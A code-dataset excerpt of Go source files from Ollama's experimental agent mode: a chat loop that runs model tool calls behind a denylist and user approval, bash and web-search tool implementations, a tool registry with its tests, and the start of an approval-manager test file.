repo
stringlengths
6
47
file_url
stringlengths
77
269
file_path
stringlengths
5
186
content
stringlengths
0
32.8k
language
stringclasses
1 value
license
stringclasses
7 values
commit_sha
stringlengths
40
40
retrieved_at
stringdate
2026-01-07 08:35:43
2026-01-07 08:55:24
truncated
bool
2 classes
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/cmd/run.go
x/cmd/run.go
package cmd

import (
	"context"
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"os"
	"os/signal"
	"strings"
	"syscall"

	"github.com/spf13/cobra"
	"golang.org/x/term"

	"github.com/ollama/ollama/api"
	"github.com/ollama/ollama/progress"
	"github.com/ollama/ollama/readline"
	"github.com/ollama/ollama/types/model"
	"github.com/ollama/ollama/x/agent"
	"github.com/ollama/ollama/x/tools"
)

// RunOptions contains options for running an interactive agent session.
type RunOptions struct {
	Model        string
	Messages     []api.Message
	WordWrap     bool
	Format       string
	System       string
	Options      map[string]any
	KeepAlive    *api.Duration
	Think        *api.ThinkValue
	HideThinking bool
	// Agent fields (managed externally for session persistence)
	Tools    *tools.Registry
	Approval *agent.ApprovalManager
}

// Chat runs an agent chat loop with tool support.
// This is the experimental version of chat that supports tool calling.
//
// It repeatedly sends the accumulated message history to the model and, when
// the model emits tool calls, executes them (subject to denylist/approval
// checks) and feeds the results back until the model produces a final
// response with no tool calls. Returns the final assistant message, or
// (nil, nil) on user cancellation / recoverable upstream errors.
func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
	client, err := api.ClientFromEnvironment()
	if err != nil {
		return nil, err
	}

	// Use tools registry and approval from opts (managed by caller for session persistence)
	toolRegistry := opts.Tools
	approval := opts.Approval
	if approval == nil {
		approval = agent.NewApprovalManager()
	}

	p := progress.NewProgress(os.Stderr)
	// NOTE: p is reassigned at the bottom of the agentic loop for each new API
	// call. A plain `defer p.StopAndClear()` would bind the receiver at defer
	// time and leave later spinners running on early return, so defer a
	// closure that reads the current value of p.
	defer func() { p.StopAndClear() }()
	spinner := progress.NewSpinner("")
	p.Add("", spinner)

	// Cancel the in-flight request on Ctrl+C instead of killing the process.
	cancelCtx, cancel := context.WithCancel(ctx)
	defer cancel()
	sigChan := make(chan os.Signal, 1)
	signal.Notify(sigChan, syscall.SIGINT)
	go func() {
		<-sigChan
		cancel()
	}()

	// Streaming display state, accumulated across callback invocations.
	state := &displayResponseState{}
	var thinkingContent strings.Builder
	var fullResponse strings.Builder
	thinkTagOpened := false
	thinkTagClosed := false
	var pendingToolCalls []api.ToolCall
	role := "assistant"
	messages := opts.Messages

	// fn is the streaming callback: it renders thinking/content chunks and
	// collects tool calls for execution after the response completes.
	fn := func(response api.ChatResponse) error {
		if response.Message.Content != "" || !opts.HideThinking {
			p.StopAndClear()
		}
		role = response.Message.Role
		if response.Message.Thinking != "" && !opts.HideThinking {
			if !thinkTagOpened {
				fmt.Print(thinkingOutputOpeningText(false))
				thinkTagOpened = true
				thinkTagClosed = false
			}
			thinkingContent.WriteString(response.Message.Thinking)
			displayResponse(response.Message.Thinking, opts.WordWrap, state)
		}
		content := response.Message.Content
		// Close the "Thinking..." section once real content or tool calls arrive.
		if thinkTagOpened && !thinkTagClosed && (content != "" || len(response.Message.ToolCalls) > 0) {
			if !strings.HasSuffix(thinkingContent.String(), "\n") {
				fmt.Println()
			}
			fmt.Print(thinkingOutputClosingText(false))
			thinkTagOpened = false
			thinkTagClosed = true
			state = &displayResponseState{}
		}
		fullResponse.WriteString(content)
		if response.Message.ToolCalls != nil {
			toolCalls := response.Message.ToolCalls
			if len(toolCalls) > 0 {
				if toolRegistry != nil {
					// Store tool calls for execution after response is complete
					pendingToolCalls = append(pendingToolCalls, toolCalls...)
				} else {
					// No tools registry, just display tool calls
					fmt.Print(renderToolCalls(toolCalls, false))
				}
			}
		}
		displayResponse(content, opts.WordWrap, state)
		return nil
	}

	// The API expects the literal JSON string `"json"`, not a bare word.
	if opts.Format == "json" {
		opts.Format = `"` + opts.Format + `"`
	}

	// Agentic loop: continue until no more tool calls
	for {
		req := &api.ChatRequest{
			Model:    opts.Model,
			Messages: messages,
			Format:   json.RawMessage(opts.Format),
			Options:  opts.Options,
			Think:    opts.Think,
		}
		// Add tools
		if toolRegistry != nil {
			apiTools := toolRegistry.Tools()
			if len(apiTools) > 0 {
				req.Tools = apiTools
			}
		}
		if opts.KeepAlive != nil {
			req.KeepAlive = opts.KeepAlive
		}

		if err := client.Chat(cancelCtx, req, fn); err != nil {
			if errors.Is(err, context.Canceled) {
				// User interrupt: treat as a clean, answerless exit.
				return nil, nil
			}
			if strings.Contains(err.Error(), "upstream error") {
				p.StopAndClear()
				fmt.Println("An error occurred while processing your message. Please try again.")
				fmt.Println()
				return nil, nil
			}
			return nil, err
		}

		// If no tool calls, we're done
		if len(pendingToolCalls) == 0 || toolRegistry == nil {
			break
		}

		// Execute tool calls and continue the conversation
		fmt.Fprintf(os.Stderr, "\n")

		// Add assistant's tool call message to history
		assistantMsg := api.Message{
			Role:      "assistant",
			Content:   fullResponse.String(),
			Thinking:  thinkingContent.String(),
			ToolCalls: pendingToolCalls,
		}
		messages = append(messages, assistantMsg)

		// Execute each tool call and collect results
		var toolResults []api.Message
		for _, call := range pendingToolCalls {
			toolName := call.Function.Name
			args := call.Function.Arguments.ToMap()

			// For bash commands, check denylist first
			skipApproval := false
			if toolName == "bash" {
				if cmd, ok := args["command"].(string); ok {
					// Check if command is denied (dangerous pattern)
					if denied, pattern := agent.IsDenied(cmd); denied {
						fmt.Fprintf(os.Stderr, "\033[91m✗ Blocked: %s\033[0m\n", formatToolShort(toolName, args))
						fmt.Fprintf(os.Stderr, "\033[91m Matches dangerous pattern: %s\033[0m\n", pattern)
						toolResults = append(toolResults, api.Message{
							Role:       "tool",
							Content:    agent.FormatDeniedResult(cmd, pattern),
							ToolCallID: call.ID,
						})
						continue
					}
					// Check if command is auto-allowed (safe command)
					if agent.IsAutoAllowed(cmd) {
						fmt.Fprintf(os.Stderr, "\033[90m▶ Auto-allowed: %s\033[0m\n", formatToolShort(toolName, args))
						skipApproval = true
					}
				}
			}

			// Check approval (uses prefix matching for bash commands)
			if !skipApproval && !approval.IsAllowed(toolName, args) {
				result, err := approval.RequestApproval(toolName, args)
				if err != nil {
					fmt.Fprintf(os.Stderr, "Error requesting approval: %v\n", err)
					toolResults = append(toolResults, api.Message{
						Role:       "tool",
						Content:    fmt.Sprintf("Error: %v", err),
						ToolCallID: call.ID,
					})
					continue
				}
				// Show collapsed result
				fmt.Fprintln(os.Stderr, agent.FormatApprovalResult(toolName, args, result))
				switch result.Decision {
				case agent.ApprovalDeny:
					toolResults = append(toolResults, api.Message{
						Role:       "tool",
						Content:    agent.FormatDenyResult(toolName, result.DenyReason),
						ToolCallID: call.ID,
					})
					continue
				case agent.ApprovalAlways:
					approval.AddToAllowlist(toolName, args)
				}
			} else if !skipApproval {
				// Already allowed - show running indicator
				fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
			}

			// Execute the tool
			toolResult, err := toolRegistry.Execute(call)
			if err != nil {
				fmt.Fprintf(os.Stderr, "\033[31m Error: %v\033[0m\n", err)
				toolResults = append(toolResults, api.Message{
					Role:       "tool",
					Content:    fmt.Sprintf("Error: %v", err),
					ToolCallID: call.ID,
				})
				continue
			}

			// Display tool output (truncated for display)
			if toolResult != "" {
				output := toolResult
				if len(output) > 300 {
					output = output[:300] + "... (truncated)"
				}
				// Show result in grey, indented
				fmt.Fprintf(os.Stderr, "\033[90m %s\033[0m\n", strings.ReplaceAll(output, "\n", "\n "))
			}

			toolResults = append(toolResults, api.Message{
				Role:       "tool",
				Content:    toolResult,
				ToolCallID: call.ID,
			})
		}

		// Add tool results to message history
		messages = append(messages, toolResults...)
		fmt.Fprintf(os.Stderr, "\n")

		// Reset state for next iteration
		fullResponse.Reset()
		thinkingContent.Reset()
		thinkTagOpened = false
		thinkTagClosed = false
		pendingToolCalls = nil
		state = &displayResponseState{}

		// Start new progress spinner for next API call
		p = progress.NewProgress(os.Stderr)
		spinner = progress.NewSpinner("")
		p.Add("", spinner)
	}

	if len(opts.Messages) > 0 {
		fmt.Println()
		fmt.Println()
	}

	return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
}

// truncateUTF8 safely truncates a string to at most limit runes, adding "..." if truncated.
func truncateUTF8(s string, limit int) string {
	runes := []rune(s)
	if len(runes) <= limit {
		return s
	}
	if limit <= 3 {
		return string(runes[:limit])
	}
	return string(runes[:limit-3]) + "..."
}

// formatToolShort returns a short description of a tool call.
// formatToolShort returns a short description of a tool call.
// For bash and web_search it includes the command/query truncated to 50 runes;
// for any other tool it falls back to the bare tool name.
func formatToolShort(toolName string, args map[string]any) string {
	if toolName == "bash" {
		if cmd, ok := args["command"].(string); ok {
			return fmt.Sprintf("bash: %s", truncateUTF8(cmd, 50))
		}
	}
	if toolName == "web_search" {
		if query, ok := args["query"].(string); ok {
			return fmt.Sprintf("web_search: %s", truncateUTF8(query, 50))
		}
	}
	return toolName
}

// Helper types and functions for display

// displayResponseState carries word-wrap state across streaming chunks so a
// word split over two chunks is still wrapped as one unit.
type displayResponseState struct {
	lineLength int    // characters printed on the current terminal line
	wordBuffer string // the (possibly partial) word currently being printed
}

// displayResponse prints a streamed content chunk to stdout, optionally
// word-wrapping to the terminal width. Wrapping works by backtracking over the
// partially printed word (ANSI cursor-left + erase-to-EOL) and reprinting it on
// the next line. When wrapping is off or the terminal is very narrow, the
// chunk is printed verbatim.
func displayResponse(content string, wordWrap bool, state *displayResponseState) {
	termWidth, _, _ := term.GetSize(int(os.Stdout.Fd()))
	if wordWrap && termWidth >= 10 {
		for _, ch := range content {
			if state.lineLength+1 > termWidth-5 {
				// Word longer than the line budget: give up and hard-break.
				if len(state.wordBuffer) > termWidth-10 {
					fmt.Printf("%s%c", state.wordBuffer, ch)
					state.wordBuffer = ""
					state.lineLength = 0
					continue
				}
				// backtrack the length of the last word and clear to the end of the line
				a := len(state.wordBuffer)
				if a > 0 {
					fmt.Printf("\x1b[%dD", a)
				}
				fmt.Printf("\x1b[K\n")
				fmt.Printf("%s%c", state.wordBuffer, ch)
				state.lineLength = len(state.wordBuffer) + 1
			} else {
				fmt.Print(string(ch))
				state.lineLength++
				switch ch {
				case ' ', '\t':
					state.wordBuffer = ""
				case '\n', '\r':
					state.lineLength = 0
					state.wordBuffer = ""
				default:
					state.wordBuffer += string(ch)
				}
			}
		}
	} else {
		fmt.Printf("%s%s", state.wordBuffer, content)
		if len(state.wordBuffer) > 0 {
			state.wordBuffer = ""
		}
	}
}

// thinkingOutputOpeningText returns the header printed before streamed
// thinking output; colored (grey/bold) unless plainText is set.
func thinkingOutputOpeningText(plainText bool) string {
	text := "Thinking...\n"
	if plainText {
		return text
	}
	// Trailing ColorGrey keeps the thinking body itself grey.
	return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault + readline.ColorGrey
}

// thinkingOutputClosingText returns the footer printed after thinking output,
// resetting the terminal color unless plainText is set.
func thinkingOutputClosingText(plainText bool) string {
	text := "...done thinking.\n\n"
	if plainText {
		return text
	}
	return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault
}

// renderToolCalls formats tool calls for display when no registry is available
// to execute them. Returns "" if the arguments cannot be marshaled to JSON.
func renderToolCalls(toolCalls []api.ToolCall, plainText bool) string {
	out := ""
	formatExplanation := ""
	formatValues := ""
	if !plainText {
		formatExplanation = readline.ColorGrey + readline.ColorBold
		formatValues = readline.ColorDefault
		out += formatExplanation
	}
	for i, toolCall := range toolCalls {
		argsAsJSON, err := json.Marshal(toolCall.Function.Arguments)
		if err != nil {
			return ""
		}
		if i > 0 {
			out += "\n"
		}
		out += fmt.Sprintf(" Tool call: %s(%s)", formatValues+toolCall.Function.Name+formatExplanation, formatValues+string(argsAsJSON)+formatExplanation)
	}
	if !plainText {
		out += readline.ColorDefault
	}
	return out
}

// checkModelCapabilities checks if the model supports tools.
// It queries the server's Show endpoint and scans the reported capabilities.
func checkModelCapabilities(ctx context.Context, modelName string) (supportsTools bool, err error) {
	client, err := api.ClientFromEnvironment()
	if err != nil {
		return false, err
	}
	resp, err := client.Show(ctx, &api.ShowRequest{Model: modelName})
	if err != nil {
		return false, err
	}
	for _, cap := range resp.Capabilities {
		if cap == model.CapabilityTools {
			return true, nil
		}
	}
	return false, nil
}

// GenerateInteractive runs an interactive agent session.
// This is called from cmd.go when --experimental flag is set.
//
// It reads lines from a readline prompt, handles slash commands
// (/bye, /clear, /tools, /help), and forwards everything else to Chat,
// maintaining the message history and tool-approval state for the session.
func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration) error {
	scanner, err := readline.New(readline.Prompt{
		Prompt:         ">>> ",
		AltPrompt:      "... ",
		Placeholder:    "Send a message (/? for help)",
		AltPlaceholder: `Use """ to end multi-line input`,
	})
	if err != nil {
		return err
	}

	fmt.Print(readline.StartBracketedPaste)
	// NOTE(review): Printf with a non-constant format string — presumably
	// EndBracketedPaste contains no '%' verbs; fmt.Print would be safer.
	defer fmt.Printf(readline.EndBracketedPaste)

	// Check if model supports tools
	supportsTools, err := checkModelCapabilities(cmd.Context(), modelName)
	if err != nil {
		// Fail open into chat-only mode rather than aborting the session.
		fmt.Fprintf(os.Stderr, "\033[33mWarning: Could not check model capabilities: %v\033[0m\n", err)
		supportsTools = false
	}

	// Create tool registry only if model supports tools
	var toolRegistry *tools.Registry
	if supportsTools {
		toolRegistry = tools.DefaultRegistry()
		fmt.Fprintf(os.Stderr, "Tools available: %s\n", strings.Join(toolRegistry.Names(), ", "))
		// Check for OLLAMA_API_KEY for web search
		if os.Getenv("OLLAMA_API_KEY") == "" {
			fmt.Fprintf(os.Stderr, "\033[33mWarning: OLLAMA_API_KEY not set - web search will not work\033[0m\n")
		}
	} else {
		fmt.Fprintf(os.Stderr, "\033[33mNote: Model does not support tools - running in chat-only mode\033[0m\n")
	}

	// Create approval manager for session
	approval := agent.NewApprovalManager()

	var messages []api.Message
	var sb strings.Builder

	for {
		line, err := scanner.Readline()
		switch {
		case errors.Is(err, io.EOF):
			// Ctrl+D: exit cleanly.
			fmt.Println()
			return nil
		case errors.Is(err, readline.ErrInterrupt):
			// Ctrl+C: discard pending input, keep the session alive.
			if line == "" {
				fmt.Println("\nUse Ctrl + d or /bye to exit.")
			}
			sb.Reset()
			continue
		case err != nil:
			return err
		}

		switch {
		case strings.HasPrefix(line, "/exit"), strings.HasPrefix(line, "/bye"):
			return nil
		case strings.HasPrefix(line, "/clear"):
			messages = []api.Message{}
			approval.Reset()
			fmt.Println("Cleared session context and tool approvals")
			continue
		case strings.HasPrefix(line, "/tools"):
			showToolsStatus(toolRegistry, approval, supportsTools)
			continue
		case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
			fmt.Fprintln(os.Stderr, "Available Commands:")
			fmt.Fprintln(os.Stderr, " /tools Show available tools and approvals")
			fmt.Fprintln(os.Stderr, " /clear Clear session context and approvals")
			fmt.Fprintln(os.Stderr, " /bye Exit")
			fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
			fmt.Fprintln(os.Stderr, "")
			continue
		case strings.HasPrefix(line, "/"):
			fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
			continue
		default:
			sb.WriteString(line)
		}

		if sb.Len() > 0 {
			newMessage := api.Message{Role: "user", Content: sb.String()}
			messages = append(messages, newMessage)
			opts := RunOptions{
				Model:        modelName,
				Messages:     messages,
				WordWrap:     wordWrap,
				Options:      options,
				Think:        think,
				HideThinking: hideThinking,
				KeepAlive:    keepAlive,
				Tools:        toolRegistry,
				Approval:     approval,
			}
			assistant, err := Chat(cmd.Context(), opts)
			if err != nil {
				return err
			}
			if assistant != nil {
				messages = append(messages, *assistant)
			}
			sb.Reset()
		}
	}
}

// showToolsStatus displays the current tools and approval status.
// Prints a not-available notice when the model lacks tool support.
func showToolsStatus(registry *tools.Registry, approval *agent.ApprovalManager, supportsTools bool) {
	if !supportsTools || registry == nil {
		fmt.Println("Tools not available - model does not support tool calling")
		fmt.Println()
		return
	}
	fmt.Println("Available tools:")
	for _, name := range registry.Names() {
		tool, _ := registry.Get(name)
		fmt.Printf(" %s - %s\n", name, tool.Description())
	}
	allowed := approval.AllowedTools()
	if len(allowed) > 0 {
		fmt.Println("\nSession approvals:")
		for _, key := range allowed {
			fmt.Printf(" %s\n", key)
		}
	} else {
		fmt.Println("\nNo tools approved for this session yet")
	}
	fmt.Println()
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/tools/websearch.go
x/tools/websearch.go
package tools import ( "bytes" "encoding/json" "fmt" "io" "net/http" "os" "strings" "time" "github.com/ollama/ollama/api" ) const ( webSearchAPI = "https://ollama.com/api/web_search" webSearchTimeout = 15 * time.Second ) // WebSearchTool implements web search using Ollama's hosted API. type WebSearchTool struct{} // Name returns the tool name. func (w *WebSearchTool) Name() string { return "web_search" } // Description returns a description of the tool. func (w *WebSearchTool) Description() string { return "Search the web for current information. Use this when you need up-to-date information that may not be in your training data." } // Schema returns the tool's parameter schema. func (w *WebSearchTool) Schema() api.ToolFunction { props := api.NewToolPropertiesMap() props.Set("query", api.ToolProperty{ Type: api.PropertyType{"string"}, Description: "The search query to look up on the web", }) return api.ToolFunction{ Name: w.Name(), Description: w.Description(), Parameters: api.ToolFunctionParameters{ Type: "object", Properties: props, Required: []string{"query"}, }, } } // webSearchRequest is the request body for the web search API. type webSearchRequest struct { Query string `json:"query"` MaxResults int `json:"max_results,omitempty"` } // webSearchResponse is the response from the web search API. type webSearchResponse struct { Results []webSearchResult `json:"results"` } // webSearchResult is a single search result. type webSearchResult struct { Title string `json:"title"` URL string `json:"url"` Content string `json:"content"` } // Execute performs the web search. 
func (w *WebSearchTool) Execute(args map[string]any) (string, error) { query, ok := args["query"].(string) if !ok || query == "" { return "", fmt.Errorf("query parameter is required") } apiKey := os.Getenv("OLLAMA_API_KEY") if apiKey == "" { return "", fmt.Errorf("OLLAMA_API_KEY environment variable is required for web search") } // Prepare request reqBody := webSearchRequest{ Query: query, MaxResults: 5, } jsonBody, err := json.Marshal(reqBody) if err != nil { return "", fmt.Errorf("marshaling request: %w", err) } req, err := http.NewRequest("POST", webSearchAPI, bytes.NewBuffer(jsonBody)) if err != nil { return "", fmt.Errorf("creating request: %w", err) } req.Header.Set("Content-Type", "application/json") req.Header.Set("Authorization", "Bearer "+apiKey) // Send request client := &http.Client{Timeout: webSearchTimeout} resp, err := client.Do(req) if err != nil { return "", fmt.Errorf("sending request: %w", err) } defer resp.Body.Close() body, err := io.ReadAll(resp.Body) if err != nil { return "", fmt.Errorf("reading response: %w", err) } if resp.StatusCode != http.StatusOK { return "", fmt.Errorf("web search API returned status %d: %s", resp.StatusCode, string(body)) } // Parse response var searchResp webSearchResponse if err := json.Unmarshal(body, &searchResp); err != nil { return "", fmt.Errorf("parsing response: %w", err) } // Format results if len(searchResp.Results) == 0 { return "No results found for query: " + query, nil } var sb strings.Builder sb.WriteString(fmt.Sprintf("Search results for: %s\n\n", query)) for i, result := range searchResp.Results { sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, result.Title)) sb.WriteString(fmt.Sprintf(" URL: %s\n", result.URL)) if result.Content != "" { // Truncate long content (UTF-8 safe) content := result.Content runes := []rune(content) if len(runes) > 300 { content = string(runes[:300]) + "..." } sb.WriteString(fmt.Sprintf(" %s\n", content)) } sb.WriteString("\n") } return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/tools/bash.go
x/tools/bash.go
package tools

import (
	"bytes"
	"context"
	"errors"
	"fmt"
	"os/exec"
	"strings"
	"time"

	"github.com/ollama/ollama/api"
)

const (
	// bashTimeout is the maximum execution time for a command.
	bashTimeout = 60 * time.Second
	// maxOutputSize is the maximum output size in bytes.
	maxOutputSize = 50000
)

// BashTool implements shell command execution.
type BashTool struct{}

// Name returns the tool name.
func (b *BashTool) Name() string { return "bash" }

// Description returns a description of the tool.
func (b *BashTool) Description() string {
	return "Execute a bash command on the system. Use this to run shell commands, check files, run programs, etc."
}

// Schema returns the tool's parameter schema.
// A single required string parameter "command" is exposed to the model.
func (b *BashTool) Schema() api.ToolFunction {
	props := api.NewToolPropertiesMap()
	props.Set("command", api.ToolProperty{
		Type:        api.PropertyType{"string"},
		Description: "The bash command to execute",
	})
	return api.ToolFunction{
		Name:        b.Name(),
		Description: b.Description(),
		Parameters: api.ToolFunctionParameters{
			Type:       "object",
			Properties: props,
			Required:   []string{"command"},
		},
	}
}

// Execute runs the bash command.
//
// stdout and stderr are captured separately (each capped at maxOutputSize
// bytes) and combined into one result string. Timeouts and non-zero exit
// codes are reported inside the result rather than as Go errors, so the
// model can see them; only failures to launch the command return an error.
func (b *BashTool) Execute(args map[string]any) (string, error) {
	command, ok := args["command"].(string)
	if !ok || command == "" {
		return "", fmt.Errorf("command parameter is required")
	}

	// Create context with timeout
	ctx, cancel := context.WithTimeout(context.Background(), bashTimeout)
	defer cancel()

	// Execute command
	cmd := exec.CommandContext(ctx, "bash", "-c", command)
	var stdout, stderr bytes.Buffer
	cmd.Stdout = &stdout
	cmd.Stderr = &stderr
	err := cmd.Run()

	// Build output
	var sb strings.Builder

	// Add stdout
	if stdout.Len() > 0 {
		output := stdout.String()
		// NOTE: byte-based truncation may split a multi-byte rune at the cut
		// point; acceptable here since the result is advisory model input.
		if len(output) > maxOutputSize {
			output = output[:maxOutputSize] + "\n... (output truncated)"
		}
		sb.WriteString(output)
	}

	// Add stderr if present
	if stderr.Len() > 0 {
		stderrOutput := stderr.String()
		if len(stderrOutput) > maxOutputSize {
			stderrOutput = stderrOutput[:maxOutputSize] + "\n... (stderr truncated)"
		}
		if sb.Len() > 0 {
			sb.WriteString("\n")
		}
		sb.WriteString("stderr:\n")
		sb.WriteString(stderrOutput)
	}

	// Handle errors
	if err != nil {
		if errors.Is(ctx.Err(), context.DeadlineExceeded) {
			// Derive the duration from bashTimeout so the message cannot go
			// stale if the constant changes (currently "60 seconds").
			return sb.String() + fmt.Sprintf("\n\nError: command timed out after %d seconds", int(bashTimeout.Seconds())), nil
		}
		// Include exit code in output but don't return as error
		var exitErr *exec.ExitError
		if errors.As(err, &exitErr) {
			return sb.String() + fmt.Sprintf("\n\nExit code: %d", exitErr.ExitCode()), nil
		}
		return sb.String(), fmt.Errorf("executing command: %w", err)
	}

	if sb.Len() == 0 {
		return "(no output)", nil
	}
	return sb.String(), nil
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/tools/registry.go
x/tools/registry.go
// Package tools provides built-in tool implementations for the agent loop. package tools import ( "fmt" "sort" "github.com/ollama/ollama/api" ) // Tool defines the interface for agent tools. type Tool interface { // Name returns the tool's unique identifier. Name() string // Description returns a human-readable description of what the tool does. Description() string // Schema returns the tool's parameter schema for the LLM. Schema() api.ToolFunction // Execute runs the tool with the given arguments. Execute(args map[string]any) (string, error) } // Registry manages available tools. type Registry struct { tools map[string]Tool } // NewRegistry creates a new tool registry. func NewRegistry() *Registry { return &Registry{ tools: make(map[string]Tool), } } // Register adds a tool to the registry. func (r *Registry) Register(tool Tool) { r.tools[tool.Name()] = tool } // Get retrieves a tool by name. func (r *Registry) Get(name string) (Tool, bool) { tool, ok := r.tools[name] return tool, ok } // Tools returns all registered tools in Ollama API format, sorted by name. func (r *Registry) Tools() api.Tools { // Get sorted names for deterministic ordering names := make([]string, 0, len(r.tools)) for name := range r.tools { names = append(names, name) } sort.Strings(names) var tools api.Tools for _, name := range names { tool := r.tools[name] tools = append(tools, api.Tool{ Type: "function", Function: tool.Schema(), }) } return tools } // Execute runs a tool call and returns the result. func (r *Registry) Execute(call api.ToolCall) (string, error) { tool, ok := r.tools[call.Function.Name] if !ok { return "", fmt.Errorf("unknown tool: %s", call.Function.Name) } return tool.Execute(call.Function.Arguments.ToMap()) } // Names returns the names of all registered tools, sorted alphabetically. 
func (r *Registry) Names() []string { names := make([]string, 0, len(r.tools)) for name := range r.tools { names = append(names, name) } sort.Strings(names) return names } // Count returns the number of registered tools. func (r *Registry) Count() int { return len(r.tools) } // DefaultRegistry creates a registry with all built-in tools. func DefaultRegistry() *Registry { r := NewRegistry() r.Register(&WebSearchTool{}) r.Register(&BashTool{}) return r }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/tools/registry_test.go
x/tools/registry_test.go
package tools

import (
	"testing"

	"github.com/ollama/ollama/api"
)

// TestRegistry_Register verifies that registered tools are counted and named.
func TestRegistry_Register(t *testing.T) {
	r := NewRegistry()
	r.Register(&BashTool{})
	r.Register(&WebSearchTool{})
	if r.Count() != 2 {
		t.Errorf("expected 2 tools, got %d", r.Count())
	}
	names := r.Names()
	if len(names) != 2 {
		t.Errorf("expected 2 names, got %d", len(names))
	}
}

// TestRegistry_Get verifies lookup of present and absent tools.
func TestRegistry_Get(t *testing.T) {
	r := NewRegistry()
	r.Register(&BashTool{})
	tool, ok := r.Get("bash")
	if !ok {
		t.Fatal("expected to find bash tool")
	}
	if tool.Name() != "bash" {
		t.Errorf("expected name 'bash', got '%s'", tool.Name())
	}
	_, ok = r.Get("nonexistent")
	if ok {
		t.Error("expected not to find nonexistent tool")
	}
}

// TestRegistry_Tools verifies API-format conversion marks every entry as a function.
func TestRegistry_Tools(t *testing.T) {
	r := NewRegistry()
	r.Register(&BashTool{})
	r.Register(&WebSearchTool{})
	tools := r.Tools()
	if len(tools) != 2 {
		t.Errorf("expected 2 tools, got %d", len(tools))
	}
	for _, tool := range tools {
		if tool.Type != "function" {
			t.Errorf("expected type 'function', got '%s'", tool.Type)
		}
	}
}

// TestRegistry_Execute runs a real bash command through the registry and
// checks dispatch to an unknown tool fails. Requires bash on PATH.
func TestRegistry_Execute(t *testing.T) {
	r := NewRegistry()
	r.Register(&BashTool{})
	// Test successful execution
	args := api.NewToolCallFunctionArguments()
	args.Set("command", "echo hello")
	result, err := r.Execute(api.ToolCall{
		Function: api.ToolCallFunction{
			Name:      "bash",
			Arguments: args,
		},
	})
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}
	if result != "hello\n" {
		t.Errorf("expected 'hello\\n', got '%s'", result)
	}
	// Test unknown tool
	_, err = r.Execute(api.ToolCall{
		Function: api.ToolCallFunction{
			Name:      "unknown",
			Arguments: api.NewToolCallFunctionArguments(),
		},
	})
	if err == nil {
		t.Error("expected error for unknown tool")
	}
}

// TestDefaultRegistry verifies the built-in registry contains bash and web_search.
func TestDefaultRegistry(t *testing.T) {
	r := DefaultRegistry()
	if r.Count() != 2 {
		t.Errorf("expected 2 tools in default registry, got %d", r.Count())
	}
	_, ok := r.Get("bash")
	if !ok {
		t.Error("expected bash tool in default registry")
	}
	_, ok = r.Get("web_search")
	if !ok {
		t.Error("expected web_search tool in default registry")
	}
}

// TestBashTool_Schema verifies the bash tool's declared name and parameters.
func TestBashTool_Schema(t *testing.T) {
	tool := &BashTool{}
	schema := tool.Schema()
	if schema.Name != "bash" {
		t.Errorf("expected name 'bash', got '%s'", schema.Name)
	}
	if schema.Parameters.Type != "object" {
		t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
	}
	if _, ok := schema.Parameters.Properties.Get("command"); !ok {
		t.Error("expected 'command' property in schema")
	}
}

// TestWebSearchTool_Schema verifies the web_search tool's declared name and parameters.
func TestWebSearchTool_Schema(t *testing.T) {
	tool := &WebSearchTool{}
	schema := tool.Schema()
	if schema.Name != "web_search" {
		t.Errorf("expected name 'web_search', got '%s'", schema.Name)
	}
	if schema.Parameters.Type != "object" {
		t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
	}
	if _, ok := schema.Parameters.Properties.Get("query"); !ok {
		t.Error("expected 'query' property in schema")
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/agent/approval_test.go
x/agent/approval_test.go
package agent

import (
	"strings"
	"testing"
)

// TestApprovalManager_IsAllowed verifies that the allowlist starts empty,
// that AddToAllowlist grants access, and that grants do not leak to other tools.
func TestApprovalManager_IsAllowed(t *testing.T) {
	am := NewApprovalManager()
	// Initially nothing is allowed
	if am.IsAllowed("test_tool", nil) {
		t.Error("expected test_tool to not be allowed initially")
	}
	// Add to allowlist
	am.AddToAllowlist("test_tool", nil)
	// Now it should be allowed
	if !am.IsAllowed("test_tool", nil) {
		t.Error("expected test_tool to be allowed after AddToAllowlist")
	}
	// Other tools should still not be allowed
	if am.IsAllowed("other_tool", nil) {
		t.Error("expected other_tool to not be allowed")
	}
}

// TestApprovalManager_Reset verifies Reset wipes all prior grants.
func TestApprovalManager_Reset(t *testing.T) {
	am := NewApprovalManager()
	am.AddToAllowlist("tool1", nil)
	am.AddToAllowlist("tool2", nil)
	if !am.IsAllowed("tool1", nil) || !am.IsAllowed("tool2", nil) {
		t.Error("expected tools to be allowed")
	}
	am.Reset()
